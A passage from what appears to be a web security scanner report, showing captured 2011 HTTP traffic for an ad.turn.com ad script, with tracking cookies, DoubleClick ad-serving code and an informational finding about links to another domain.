z6J-BEk0gCmyMGiyl2orSTXJgj3PYUSQksso83I27-VpIdXcEj3ATIHZ85bzjN59N1DesUH20WtmvEB85BGPQpVkX1adMEtSrGVs2U2coDfuajCpNlzAU3BFA2FUt1sY_z7JOCOD7od2p9Te_znzPLbFA49dyv4IOKemp9vkrTaHkid5u8voWars0ao_qpATqMTOTrNaZNANkBQjTexPCSafTSgpU4WHI3o7mz1yzeVtYE8N214FgBQDqQ4AvNfADBxNFi6SzWBu_A0Bbz1DMFVPSwfzkEF_z-gmdBqR5XUS_M3WvwMyoFdwzhFXPWWQAksB_srXEX4XpRKl9JBbxfxCG0ws7RKdslrrWG9FSHPfhOol8x7GcPW7kOnjSxzWjOywl4MuvfIipJ5uQ86jruUqv-BIgls5GMzhMPeQwyEEFAsLCSkxSCrw_Ka5doSqf2n0-lzpZDW3GxkM5Vc5hSjx5E4ajxLy24vZakjmlK7hBJK_lYL5YT6meUEDXaDLlth6GMsF-ZOXLRkCIiZdG4M_0HrCDKWrOFAi-3C0FAmBHnxfGYbg8COr02CVA34ezeHr4kD4IlHa-MMtxzuRfpv6ZVy5tUFP8vHhPZZkAmMM57eIbw_tY4C8HwmvvlhVGv8f4oOlu-Y0H6CqCbpQlF3v4slE2NCoocDEbMh7cDYOl_pU1S1DLzGiyxwGcuqgclX7IX5kFw94Ao9YPRny-RliH0i_LnkGLCdmk4MHDY7cSGOzokR-Oj8vP_2TSIYVN-8eQQ9O4KBYCVz0qItajtxmAshwxhbdMwe6MleT6PyVNqDXQwOLOIY2xu6P46AVksb7XdGynWyfHWytc_1lQPjrr750zRIZosJx9vG-GX2NHM7sKXJ37jo8-Jo4l8ddCZ0vbPY7NuPCkRfUJhuE9AG4r1_YBTH-5c5XvIOWMQKl-cdIC2fZhQepvvG5ZZZnAWHUIL1Guk7LM91kn-aJkpfOMQrt0lXDDGNIVD1SIh95bnm5A1FODwtLmHFCk4l3u4YUf8ReOuAPhbr9Nk34bCLmfH7Nl8tw2WqHUUkZ98JnJB6oWA0COW-xJeoEq79QtrOIBhaDR4tImYyfQddC6mxEIQGL9aux0Wy38Bq74ivwwUQ60dTkdFij10MJiUa9kl48TEunCtFLndtCy8eree7J9IekinTGw43yVJN00xxmSO3Zgc6iCsG01x0Dd27QFsrbn5uOBEJpIq5XcXboltYJTZc5dzQZbKS7KFurg7MY4t3auAill3FqTv4t7sCFOwxvjx_ZcdII-FGoXPlGQ-BM8eHGmxiK1X6esaML5Acc_Llvj5X9yLN7-Yc2YS4k_EO88xj88xPI03nF5WXwZ25; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:23:34 GMT; Path=/
Set-Cookie: fc=sVaQWGK_c_yr5nji4YJUfcbLxG6Rjky-ZVHROMXM-1E4OhgZIpdKD2vECvnz_VEM2CjyBHHN4B50paqel1-StJLdzlSJYnWgjgpSWPKJZqanh77CDv_Cb5k2sLKUWKhYlRW_MKDTtf-sBpmbpaidAFDzQrUnrBcELT8jzJBt9GgVxzGoC7kGLIbIhejl5eSL117dg5whaFGMwxNuo3bM3cdBF4hyWWGJ3xpNV_dvAQw_F9c8z5-xQ96PvJcb-tlK; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:23:34 GMT; Path=/
Set-Cookie: pf=VrozooDcByghq55gga6oN_Blt_n-BRpYF3beF1itT8sIHKIn0aMUCJnjty0nF6sdgjbg707c8UN19xROYfxBRNS2adKbTT6osPmdQ8QvGT_B8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:23:34 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 16:23:34 GMT
Content-Length: 10874


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
oncept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;


document.write('\n\n\n    \n\n     \n    \n        \n        \n    \n\n\n\n\n\n\n        \n        \n        \n                \n                \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N3905.turn.com/B5269631.6;sz=160x600;ord=4362734341326432640?;click=http://r.turn.com/r/tpclick/id/gOkoyMSLizwQrQcA9wEBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB1Ut5hU60TZm4EoX1lAfxmN2HAsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtzaFmwsDVNDneUP-J0S8ckVGnH7aw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3905.turn.com/B5269631.6;abr=!ie;sz=160x600;ord=4362734341326432640?;click=http://r.turn.com/r/tpclick/id/gOkoyMSLizwQrQcA9wEBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB1Ut5hU60TZm4EoX1lAfxmN2HAsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtzaFmwsDVNDneUP-J0S8ckVGnH7aw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;">\n</SCRIPT>
...[SNIP]...
3DAGiWqtzaFmwsDVNDneUP-J0S8ckVGnH7aw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/http://ad.doubleclick.net/jump/N3905.turn.com/B5269631.6;abr=!ie4;abr=!ie5;sz=160x600;ord=4362734341326432640?">\n<IMG SRC="http://ad.doubleclick.net/ad/N3905.turn.com/B5269631.6;abr=!ie4;abr=!ie5;sz=160x600;ord=4362734341326432640?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>
...[SNIP]...

23.48. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689665&l=728x90&aid=25919898&ahcid=1089768&bimpd=4iscdcrQg2DEYB_fAgs1OTdufYS_9rVh88_KQClOIF8RZUVTgvOBmsYjEQ5AVGChbOaWINprEDeBxIrSTxP3xa9niBJoz6621irB3f190hVoi5oxQPyCItoVSlkU2GiEKa7xi-Yh-L5zIgjO7n9XM9W-SvPVZ9uvWN6QKCcGWsFt1AnXVvRUHCS3x0AwhdfJ3aw-YCEaz7QM4D5LAnxbQ7rSVSD8gxGQo9yWqnwnO2rMXyWWCw2Wg6_6Y5q9_p_bBbemAK5ac4pIU_r3DPlTr6SpNtS5xAFUzv3qcEVeuuxxX0onbqlp94UcyJZT3SBOKttow5g-rySYtOkVF8bTFqY_8_8Z7NXseqr49ZBcif04vrDQ0fB507iMqqrwe9-wCcJzEb1qj5xmeir2G5gfeRFOZkHQDULxzGhZ5miPO-MBK6o41OnjVGPDnFcPiw702t_rQ7srsXknm5tu1vimODn1FAv89x4axE5Jcvz3NtFMDIEtJeySEAHPBemokDuS-jC1UtHHNFwS9St3vhOQNuG-cgitwdOGy-1t1LkciqXUoPaaHnaoorULvxTzi44m1_Si-euS0zvZ4Sy6x3y4oCJ3_lrfOLHGp3Z7z6cdQ5yP-_WAToXeZqf2MtabD7lkVaOGOyExKJZTm-Y9XkyAdN-ahVAQAFXdGsFm3CQtVRNcURMhRM2LhpW-3_PATP0ldS_tt6tjHLWep1NYjOYOW8Y5mWoOHoF4xNoAiTtMvK6wrRTD9o2SJxjqGPytYYwfCN76B5My79hs6m5sVTatSA&acp=TbRANgAGvRUK5X5JH2pw8u5ABJsFnmbaw37_FA&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBTeI_NkC0TZX6Gsn8lQfy4an7AcCshNAB-KLb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEJNzI4eDkwX2FzyAEJ2gFIaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl83MjhfOTBfYi5waHA_c2VhcmNoPSU3QiRrZXl3b3JkJTdEmAJkwAIEyALsk-kJqAMB6AO8AegDlAL1AwAAAMSABsPLiLav0OCOJQ%26num%3D1%26sig%3DAGiWqtxFN-SWoeyrcbJOM_G6FSduNZ7Mqw%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676553&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658553416&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658553422&frm=1&adk=513358139&ga_vid=780386006.1303658553&ga_sid=1303658553&ga_hid=1236518823&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&eid=44901218&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2931142961646634775; adImpCount=kyaF6gUD2ogiRbFKITVt2CLBbK9hGYb7tYZ9lMq09Bth-L3XcPmT4hHXOQgApIlY77DtXuOsguLFXai3AhFvnPZsdOWLg55db-rGyslK6Hn4Gsu4bgzX3HPXF8aZ-svzaHqjEn6Y89hUb1ebcReTqO0G0mfFUdQh0TS12QC5rdcEQFPmYJ3rqUD9QPKwbtk5K4Bt8JhwZLYvehf4NBsmnyIKcv1LAW-mBBr1OzbKK7fBXncWNq4tgMJJshUroyx_WEbJ-rIqR1GtAnSA4XhxpWnSvjM6YIyaPo076xrJcUOc8RRGgvoC_iUj7JHrrfW-FetVKkrtsUGq68Ju9Zd7_EosZmqoV_fKvyvg6r3XOH7MI06PCPz6SlJ9Tp5_nVS676c4pTy1x4tO_Sj_92V_c3SxS3VorzlwkEhSbBK7OTawzOueNcvo-1XmGz_MBiuX110qkc59lFVJvNpGPUP2wJAqceEU6XGEFocvi90WKNJMNQF2iyMUjVL7ttzR-BfUDJxJHKwAjtvS7JC_JU5gJs5cySrnTOh9dMxUw7WE-japYJFT5qeRs5WiMggPJTPn1zw260sqlXL0fyuscBmdAK477_djhhS3SPkBUOiwXvNoGaZN_peS_gRNakNKmh5lri-pvt5MhqWaQjjpMBxrbAo-L5rETPXxooovlCLilV2n33YtTIMdu8SBL5DeBrA2fvOlTreFo8nIhLOXDY0psY3P27ULaTkLXzNamGAdwjpcWuh9OwP5WPMPXscRpCIMOL0Xv5Km6cwKKJunGQN8supAA-ArKfxTL-7MRBZP9MhueA6joXijA3s4lagZ_BmcOXqY976a_1Nlv_NQjmktKGnSvjM6YIyaPo076xrJcUOVpftxhSRtjlD2oauk78nyNr3GB30P3CH9Sr9sGAFic6HduGAlz4s_PEOBZx-4R5PetSZNGlikrbSs2KMthrar76c4pTy1x4tO_Sj_92V_cwwz4GXsFc4H-xnD14v7f_hA6MqNvwYSm0g4KbgKOtK741Np2lavK8z5Hx02RSQGKBLO5mKRy8hesQHoEYpbRQxMNQF2iyMUjVL7ttzR-BfUHMeQr7HzPb7V7RxoS8Qhc85cySrnTOh9dMxUw7WE-jafPiOA-QB6Xy2bC_vhSKOzzklaZ_wLpDAv1xVQWKDw-K477_djhhS3SPkBUOiwXvPp3Jgcpy4VfMw2pfcg-txUri-pvt5MhqWaQjjpMBxrbOBXWwq4uwWmmDpAEmwu4u4dPftSyG4BXXRROxOI0f8iQ912etMxHez7HFbRYJQYuocOyvBMeMLulU9P42AQU5hcWuh9OwP5WPMPXscRpCIMTKDTFhH38xaYIb-7s9DAtlc9Xlr4qPB8H_mMgIcX9Mj89Ns8YMIodbd9oSQ80dokt8PsAVL2uwYirizpTiK_qW54DqOheKMDeziVqBn8GZxjSVx-2Hc7xYDfOKeVcWhwadK-MzpgjJo-jTvrGslxQ8WFgJSMlJVR1x9l7Is5UoWSDLGGPPlxre_-Z5a18ORVq0mocERAq-g8WL7raH5umyie81amh01ugHe7dMbwSgHvpzilPLXHi079KP_3ZX9zhCEW2MMTRkloMsHnOX4EamYjiJWk9aQzyVLZH2OXmNYSiQAGCVi9y8fGsouGTQ5rnhBuogcJhkDICslcvwUSsUw1AXaLIxSNUvu23NH4F9QNarZpljxA4ZzAa8efnP4-zlzJKudM6H10zFTDtYT6NhwXcyJdt-ME37PlmKbW5FdPqvYOOFb7ZkdNNeZJQGsOrjvv92OGFLdI-QFQ6LBe80MUVk0bbLsRtScFuRAYKGOuL6m-3kyGpZpCOOkwHGtsnu1-LDxTaiDeVCtXvyznTBtl70b5ppVHKhy7IaxSI2wPuT1ACEDXL2USVvUXEsxN4glLRZDeHV62V6KNTfyMM1xa6H07A_lY8w9exxGkIgyTDfLoDCgW6KFHD-N58QxFFz2mga6XNn5IpFZm6YBkEGckgCGSuiZNCnk1aHQCYkBFVhTI12-KdQ4exVsPJWIpadK-MzpgjJo-jTvrGslxQwctYSNGVRfOVTwIlfIM0DWsSvtIXzlO9M-JZBly3PX02_hjlieDEGkxFdag2l_AoTsoH5wvVXWFnOZ5NZRHOy7vpzilPLXHi079KP_3ZX9zp0eB-MWZ2RB94zgNsHKApjgg7I9RHAuYlfbpLlPU798nxHOPx7pfaAgE4Tkp9sT80cJvFuD93J5eiSNpAOQABUw1AXaLIxSNUvu23NH4F9Qxq0b0vVKyd4RxlHwJ3rgxzlzJKudM6H10zFTDtYT6Nm57svxtKkhEarYzSqASKQGd9mkrPpa-G1n8PzOWd8r4rjvv92OGFLdI-QFQ6LBe89JHPGx1kZ_-bhcQj7BMlNOuL6m-3kyGpZpCOOkwHGtsrWejYiWNISvA6MVQ_iEnSUXnHEmS9A0XjZrO1Xh8wH0MZ10CebiWDV-mNIquAUWjdOVMSKB5R3dM7WsY0v06xzi5ZBQyfHCrHjJc3PSoWMpJfy3wgOWH97_PT58kxSWQT1OFNB8Ovy51CO8L6DPbfzh43Fw31xS3hqt9Zav2nSZdTQBate2OQZTR8pwT7ZCZlzGmznMespu0YHZWyToiHIMzSjimono9hF_GkhG9I0H9CaG1pw7Xzi4OmJFZBSRcsAeY0xXNX6AFYYw_3zwY0yLxuhK58A8M2DTIIgNCF6MPwvhbKQYrTGX4ACZPeas1SD4nsNj_GEIBR0bRoE0zzqz0bRiWNcqpzIMWMi0tBI7VTg6H9uOZvjIiCvc_SRAIH-KVXW1PKTYVth4fyUuaJdXDes_2im5uRIbJWhLJRtXBoLxvDoy9qaz2v9C9GrmTR_eNra5EoXAiXON6CRkMu1Z9yXy-nBcaooJa9ccp0it5mdYCuyxxNAZWUfQUnv57b1BnOgadNpyjNCvOEKQ_ZwqxuCzwCm1mOXWWCSqc6kBqED0l15BVc0oAcn_L2L6uLDjCJHxwijPJP4kTwwZWYjAT9dB1TlSGl-OpsGXVadZwvkgYnSImwJ9KOtnb4Yd_cRD-u7gqODNv0Os5ZVFIMEvi7v09CdTG8noyemeuYMhLgYtfjHjihMAdRzh7o_v5k0b1X2XaoabPgVJef-bsWd6GswF9ExFtbjUIyFUrPe5GxhEIK9tIBfhdnkANBW3etR4OFHMm4MY_54o8pYHsJ7Pt6J99NZ_xp-gbOMnIy1KkRudadPwLRkSeZBZAoURzWVQi5jAOc9TkwksP4DiXZ8MOOsEK99ELBPMukcZb-I_ow02xyzPMzWv5aPUAfb4ih9h1NhnRi2QJnuVAj7FQFXqTHcEoc3XdUiGw8v4nsuW5wYvg5V65MJfMA9694wIBPusuUZ02NVMmUFdHlCX8JX57Y-ASloPeDm8lXuqS4BobkK-CXjIVHVIu3nv4dgOzAi-1uNuIro8z8mHB9TsRdLuAwY988vm6krBg6nXDIdlip-HsmT9Sqc1jzMwF1prCJJd819mRdoDFabEUwupZtIuw-Ra-5LZwlW1Ehm6QMkKzEpTz6OjMCFnIEruvSIMrXFeD1gzzQhZYSP3FLhxo71cdfR0cNTNggFkQ3GrrB1Y; fc=a0C-JEfXBP7yBhKanrj56rOtyjtdmxkxUENe4cZ9dS8jJU3u7yxMXk5wO5uqxHVXfplP4eeXzM82fC7-2b2C1qxdMLn-DYTOi7o-kwGyn3897sUSWECplOWoCGu6QJkQLu0VsgQ7VkocrouoZ8GHAfpZT2r-ImqIbIee7QyEpWA; pf=aFwamu9mzx5OZ90ThgYigsJc-KTHTcRIjWDzmw1FFGiS04H7stKnZdMqlx3yK2bUj8tjGU5bul5JxoJpZD1CNpxKMUvxbd3f4Da9CFOTnTLWCQKR_r6qY54lFjJbA4MKo2PgnaN3rNEZPcj1JP_yFl3OnJaEawY-HzaiUFPHnzHCJURYTll9YSZFjFvcZECT7ANZN-zFyB3LaaiNSQAne-eUjAeuFexCQpSIGGE-hCu26aZc5sDc4UJmeMYA4wA4zO05pHI-TuL2Zs_aTFBxV5zGyX9gCVIJL41fXCewMtGIOTObyhw6XI9NsuIQ3LHMPwDuZeCTmjbOJ12_tYZY7qYaNMhlV9JYPNAa9WJ26feij1a04Z4aJbTbeEF7HREPS4iF2IFkJR-IDjmCPDngrg; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 15:30:19 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:30:19 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=WpYAavWG8NUy776uHJKryGp9RGM8p_PjjaXztrdp4_zDlGIUOWYS4TNj-1gj_Xcu77DtXuOsguLFXai3AhFvnD-66dzGnAiv0Ie8pbnze1r4Gsu4bgzX3HPXF8aZ-svzaho3UCU7Y1WfW1yv2EPwU0ywBbEJ4wtzflynm2A6q-ptRzzSZsY8mB1qGfkb6jtU4HD0ASoh5WYAFlnK0z-srCR-O5dX51y8gYkwAAheB4I5FG10r3YHwmKuH99C4G4070nMXe7V-9nqnKuLHBhbCmnSvjM6YIyaPo076xrJcUO342kJB_3Uewqi_uAbK3NskBNn_TRBrw78HyPdexCRUatJqHBEQKvoPFi-62h-bpvI_3A5VA0b-fG_83imesZD76c4pTy1x4tO_Sj_92V_c5rj6RW1e30l5M1-9q1VFHvBxQDH60wp7kWI6OtXwmsK39uQ1iPta8Wrn8c58UAYukRVSWbxrW5RvDOPG_vU035MNQF2iyMUjVL7ttzR-BfUkHil56MNtWZts5kK3Nm-kM5cySrnTOh9dMxUw7WE-jaodBD6ws7-HdHTHzCqm_3tnpOR4T5SS4ejOs9JomIbHa477_djhhS3SPkBUOiwXvOVIX44uFqHBc-_BmYBbtb2ri-pvt5MhqWaQjjpMBxrbJvhxWk-MTusUtlOwu8n8_6Y2xciLiAYbTRw8tMse4VYQ912etMxHez7HFbRYJQYunbMQwAAUgcxqLg4KAUwiTBcWuh9OwP5WPMPXscRpCIMFgYk0g4sqiDv0KMBB-2QoJCETjzkSC7tasCdAmV4LhRueA6joXijA3s4lagZ_Bmc6EBWqEXY40Wh60cxk3mifWnSvjM6YIyaPo076xrJcUPcoaxIOFnwJ4ai9esbBpgGNZSYACipK3Mv20tbxmPZbz3x5IZLlP72HVpefcBqXkZlifidpuKXbSR-DpAjw7aa76c4pTy1x4tO_Sj_92V_c7crZtdygln7vwW9_HMUm85xoeOZu-XoFLrjrKvelKH8h2wcMme0iUWoKhBYOnQRKVMU07CvIX0nMv0m6vVeFyRMNQF2iyMUjVL7ttzR-BfUfvfGIHMZ1m9F5cCegvKtSc5cySrnTOh9dMxUw7WE-jZQdAp7kgnjHFISTLB5rZnYfCsLZClCK9khSXHpjct_hq477_djhhS3SPkBUOiwXvOSg2L5Ybt2o7KTrhAe_Mygri-pvt5MhqWaQjjpMBxrbOtFAQ6JsEnQF4Ca_kIGEBQ7Ma0j24I5rNz_wrb7nduBfvOlTreFo8nIhLOXDY0psTXuZU7pgTMPbE-QuPspLOlcWuh9OwP5WPMPXscRpCIMoXu81N2FQa4sCo2jbnS22yF5KcZHbj093A4xzwL_jMD89Ns8YMIodbd9oSQ80dokOQprh44cdhhn5KUquPb1QqkON-yWtXIPEwEOUimkQkfHl2ZFZNL25Ue_NK9nhNLMadK-MzpgjJo-jTvrGslxQ7xe4B_qAtQEBmt2prPK8v95xA_rvxJf0kdWomdIMrfwZDcfvrLS2dOnKVZdAFZPPCNekQR227PG1Rbmm3bxZyTvpzilPLXHi079KP_3ZX9zYMeTjevSFk2SMc9P3Ay35Cf2BXQhSGVENGxgKqnojxrf25DWI-1rxaufxznxQBi6aWsfJ03JTnZJ6JKG5MQx-kw1AXaLIxSNUvu23NH4F9QwRTx6t2DxSFNUlQ0sL89yzlzJKudM6H10zFTDtYT6NjPm5nOqfJBjoCziGcMjw6_Ugg405Bl6YI5qhlk3bM13rjvv92OGFLdI-QFQ6LBe8wx7wJIROjfkdQrnyM8f12auL6m-3kyGpZpCOOkwHGtsR4b1B7OQLOz-xMs9JnOtlJmQ3aeh6DP-lPKnYpBKwsYTQQ0puXo0EsZdRPUbUQA7-HnsjGRYFtpCN2OhxyGkTVxa6H07A_lY8w9exxGkIgwYLyQMK_xFsleORqJ6nP1R9zDevNx5COsDJ5HkBVVkpMmgfhw669hSVOQI1ygrNgD887vxMjh5xmUSOxh9PfmA4VH2pdpMgvK7hAPIIs1ri2BrMpCr3aZegeRdzYkKPWeGX7xk6PLGuwQyNyhWDeAxk1ewXzzAaUCqh2eM6_3BFon4ESTSAKbIwaLKXaitJNcmsrkK7XnUXHED_um0fSYPxyOL8crcG_gLQXjoyYKCkd3HavpUijr4HqLs6LCYnFk6srM8Nd6iJTvVaG5idM1wu7AbQgisbk6PL-dP-FLK0DJ0BIQ3r0B8VfmStd56okzgGgBIOdsFKCC3_U_8Okbh8uOXbW5G4g8N8FhqReKtXTyiLjMkpm9v2-MdD_2CmY3EsXvabIw4XEF9E0guSyaVF91_TjZKR4evkLrL6qcBFJDETQKpo7XVlcQ8-l_yli2eiug8-3TS-eWG4zgmqm02EOmPwMWxSliUI4f-XkgGC33rm--dL65XS9oD2kwF5AOLVJj_8xF2DRm3E-KBa1Vh6JFxjyye4BQpfeA_YKjV35WQVjhQZH14Ew0DtT3vvbeZljl6lQtPE0OR5imdRImakDp20ndZB3v3gJHZZ9686Ue5xClIy_RsaUhaZSKwXHKIf5eKW07x3MNPfUWEKG8ZsW7FSMHHmO_SlDisnbf2pNwlKgZopBSF1dH_zxNWFjmM5qJ938JZ_vS_hO86zw5PFvRGXgxsKuJcDQaURRpEI3udlUGwyN_r-yG9N84D3nWBk4a1yqpwantvGm3_5Lrb38Y5aPLIJmajxG00UxIBsL2msdE_rYNksKKGA2Sjm5uD5tEWexIt2EQAUDBpcXQP6gpFU1PoSMMfiKENads5K_8oG0sXt486cnuUAhCu01E7NwlYdmoc8EQAGWWwwXxEjzU82Ov_Pc3fpqRjOQ0LvGqa_Zixb5ooZ6j-NXlrtVc5FShmFdYV9DU0Xrrxwmm5-Ix1NizVC3J-PvBD5reBv5QiPntNktg3bq1W2w8obg6VVsjPYx8Z3IfxX5Y115NRQBmB3uev2tytXk6PjhlOToEEJexHg4zWbT-BqBaltehss8oY3vMuSjynCiPuoexMGEpK4cDlAJOGXOZjFhIJDbcG8hYtHOZnAbobGtfWYIYmp1oj2W8lNXnDppcnBHwm6pOg6nIvr4ILZILxTPKL19pFNzzJELTPlu0Xt8yuQ0f45qTdJhdRYupeAkpQzAgc7IqeIKUEhcqOgYaH2d0S9YzrwtTL00OI8bDpRwTSNmMAOwYKv6jby1wj8JYvM-QrO6sHAQw8ifLBKjnPp7gin2Vz26e1o-fga6Zfg9K06Js00RLUkk9T0TkYnbjkF_01GvkpXBDJxjy2lm8Heta2DjZUN9Bn1UkMdjanhCuyFYnXdOojFWDEAyG3e1sPJousDYX3iEys5Kr5lM1Q38pi4awQg9g9tZiaHV-PU_rmmgXpwslcBqYAiHUa_aKUsZ1TSVoNw8nqrijiyj3y3ddJyfBcivG-y2aI0ysp0PhN3Lc2zcbbxEex8QqQJlfgjs1R4QJ-K8oDdUXXQkrfxt5H486gDt0D5vJX2d6iI9kMQTK8UZuwguWTAhYsAnCtjf_6ERq-rTQNR18yep3W8vrzp910nS35UI7kGK7NiRfcS1KmnQCNkE5gUocN9ZDrDFcN; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:30:19 GMT; Path=/
Set-Cookie: fc=ZLFjGQFGrzO1zENbggBmsYaegatF2B-X-t0nA_mR6n6Xj2VWkQs_pZe2x4BlBj3dlN1QdeW4zlTZ3FmFjhpKQQJrwSGLhtnJB-m4d5r1mk0PpZsczLZg-X3ewhfnbE_kaq3VcZ9RZeFJ5DmVciVRNT-17uf2fQ8lD0LtIx6_Iq4; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:30:19 GMT; Path=/
